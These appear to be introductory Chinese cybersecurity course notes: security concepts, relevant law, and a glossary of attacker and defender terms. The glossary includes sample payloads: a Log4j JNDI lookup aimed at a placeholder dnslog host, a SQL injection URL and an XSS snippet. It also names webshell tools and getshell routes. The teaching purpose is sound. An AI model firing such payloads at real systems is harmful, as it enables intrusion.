第一章-网络安全行业
1.1-什么是网络安全
概念
网络安全:网络空间安全(Cyber Security)
信息系统
信息系统(Information System),是由计算机硬件、网络和通信设备、计算机软件、信息资源、信息用户和规章制度组成的以处理信息流为目的的人机一体化系统。
信息系统安全三要素(CIA)(面试基础考点)
- 保密性(confidentiality) [ˌkɒnfɪˌdenʃiˈæləti]
- 完整性(Integrity) [ɪnˈteɡrəti]
- 可用性(Availability) [əˌveɪləˈbɪləti]
其他(了解)
- 抗抵赖性
- 可控性
- 真实性、时效性、合规性、公平性、可靠性、隐私性
网络空间安全
包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”
国家网络空间安全战略
网络空间和海、陆、空、天,并称为五大空间或五大疆域
http://www.cac.gov.cn/2016-12/27/c_1120195926.htm
网络空间关注点
- 信息系统——网络空间域、物理空间域社会空间域
- 技术——法律、政策、技术、管理、产业、教育
- 信息系统生命周期——时时刻刻
网络空间管理
《*网络安全法》
《Cybersecurity Law of the People *》
网络空间安全管理流程
- 确定网络信息安全管理对象;
- 评估网络信息安全管理对象的价值;
- 识别网络信息安全管理对象的威胁;
- 识别网络信息安全管理对象的脆弱性;
- 确定网络信息安全管理对象的风险级别;
- 制定网络信息安全防范体系及防范措施;
- 实施和落实网络信息安全防范措施;
- 运行/维护网络信息安全设备、配置。
1.2-安全常用术语1
黑客hacker:对计算机非常擅长的人,窃取数据、破坏计算机系统(anonymous)
脚本小子:刚刚入门安全行业,学习了一些技术,只会只用现成的工具或者从网上复制代码
白帽子:白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题(360补天、漏洞盒子、CNVD、CNNVD)
红帽黑客:有正义感、爱国的黑客,利用技术维护国家网络安全,并且对外来的攻击进行反击
漏洞(vulnerability,简称vul或vuln):指的是硬件、软件、协议等等存在的安全缺陷(http://www/cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3)
POC(Proof of Concept):能证明漏洞存在的代码(例:${jndi:ldap://xxxxxx.dnslog.cn/test}
exp(Exploit——利用):执行了这一段利用代码之后,就能够达到攻击的目的(msf)
payload:攻击载荷;SQL注入——http://localhost/sqli-labs/Less-3/?id=-1’)union select 1,1,database() --+;XSS——< script>alter(1)</ script>;log4j——${jndi:ldap://xxxxxx.domain.cn/test}
0day:使用量非常大的通用产品漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞
1day:漏洞的POC和EXP已经被公开了,但是很多人还来不及修复,这个叫1day漏洞
Nday漏洞:指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。
漏扫:基于数据库对漏洞进行自动化扫描
补丁(patch):漏洞的修复程序
1.2-安全常用术语2
渗透(penetration):黑客入侵了网站或者计算机系统,获取到控制计算机权限的过程
渗透测试(penetration test):用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据
木马(* horse):隐藏在计算机中的恶意程序
病毒(Virus):恶意代码或程序
杀毒软件:瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀:绕过杀毒软件
肉鸡:已经被黑客获得权限的机器,可能是个人电脑也可能是企业或者*单位的服务器,通常情况下因为使用者并不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡:利用出现概率非常高漏洞(比如log4j、永恒之蓝),使用自动化获取肉鸡的行为
跳板机:黑客为了防止被追溯和识别身份,一般都不会用自己的电脑发起攻击,而是利用获取的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色
DDoS(Distributed Denial of Service——分布式拒绝服务攻击):发起大量恶意请求,导致正常用户无法访问
后门(backdoor):黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下一个“入口”
中间人攻击(Man-in-the-Middle Attack——MITM攻击):运行中间服务器,拦截并篡改数据
网络钓鱼:钓鱼网站指的是冒充的网站,用来窃取用户的账号密码
1.2-安全常用术语3
webshell:
shell是一种命令执行工具,可以对计算机进行控制;
webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作
分类:小马;一句话木马——godzilla\behinder\ant sword;大马
Getshell:获得命令执行环境的操作;
Redis的持久化功能、MySQL的写文件功能、MySQL的日志记录功能、上传功能、数据备份功能、编辑器
提权:权限提升——Privilege Escalation;
普通用户权限,把自己提升为管理员权限的操作就叫做提权——www——root
拿站:指得到一个网站最高权限,即得到后台和管理员名字和密码
拖库(脱裤):拖库指的是网站被入侵以后,黑客把所有的数据都导出,窃取到了数据文件
撞库:用获得的裤子去批量登陆其他的网站
旁站入侵:入侵同服务器的其它网站
横向移动:攻击者入侵一台服务器成功后,基于内部网络,继续入侵同网段的其他机器
代理(Proxy):帮我们发起网络请求的一台服务器
VPN(Virtual Private Network):代理;加密通信;办公——在家里连接到公司内网
蜜罐(Honeypot):吸引攻击者攻击的伪装系统,用来实现溯源和反制
沙箱(Sandbox):沙箱是一种按照安全策略限制程序行为的执行环境,就算有恶意代码,也只能影响沙箱环境而不会影响到操作系统
靶场:模拟的有漏洞的环境;
可以是网站、容器、操作系统;
类型:
web综合靶场——DVWA、pikachu、bwapp
web专用靶场——sqli-labs、upload-labs、xsslabs
漏洞复现靶场——比如CVE 44228
操作系统靶场——比如vulnhub靶场
CTF靶场——专门用来练习CTF题目,每个人都有一个独立的环境
堡垒机:跳板机——jumpserver;
运维审计系统——管理资源,审批、审计、访问控制、事件记录
WAF:Web Application Firewall——Web应用防火墙;
对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为
1.2-安全常用术语4
APT(Advanced Persistent Threat):APT攻击;
高级可持续威胁攻击,指某组织在网络上对待定对象展开的持续有效的攻击活动;
报告:2021深信服APT攻防趋势半年洞察
护网(HVV):国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习
CTF:
Capture The Flag夺旗赛:起源于1996年DEFCON全球黑客大赛;解出题目,获得flag,就可以得分
是一种黑客技术竞赛:解题形式——Jeopardy;
攻防形式——Attack-Defense
方向:Reverse、PWN、Web、Crypto、Misc、Mobile
在线CTF:bugku——https://ctf.bugku.com/challenges/index.html
北京联合大学——https://buuoj.cn/challenges
CTFHub——https://www.ctfhub.com/
bmzCTF——http://bmzclub.cn/challenges
攻防世界——https://adworld.xctf.org.cn
CTFSHOW——https://ctf.show/challenges
CVE:Common Vulnerabilities and Exposures——通用漏洞披露;
Mitre;
例如:CVE-2021-44228
CNVD:国家信息安全漏洞共享平台——https://www.cnvd.org.cn/;
国家计算机应急响应中心CNCERT维护——https://www.cert.org.cn/publish/main/index.html
应急响应:一个公司为了应对各种安全事件所做的准备和事后采取的措施
SRC:Security Response Center——企业的应急响应中心;
公益SRC:https://www.vulbox.com/;
网络空间测绘:网络空间资源收录;
网络空间搜索引擎:www.shodan.io
fofa.so
www.zoomeye.org
ATT&CK:Adversarial Tactics,Techniques,and Common Knowledge——对抗战术、技术和通用知识(攻击者技术的知识库);
Mitre;
风险分析模型——收集威胁情报,模拟APT攻击
逆向(reverse):把程序还原为源代码,分析程序的运行过程
DevOps(Development+Operations):开发测试运维一体化
CICD:
包括:持续集成(Continuous Integration)
持续交付(Continuous Delivery)
持续部署(Continuous Deployment)
具体技术——Git代码管理、Jenkins版本管理、代码扫描、自动化测试
DevSecOps(Development + Security + Operations):安全开发与运维
等保:网络安全等级保护;
要求相关行业的单位和公司的信息系统必须进行定级,然后在*机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督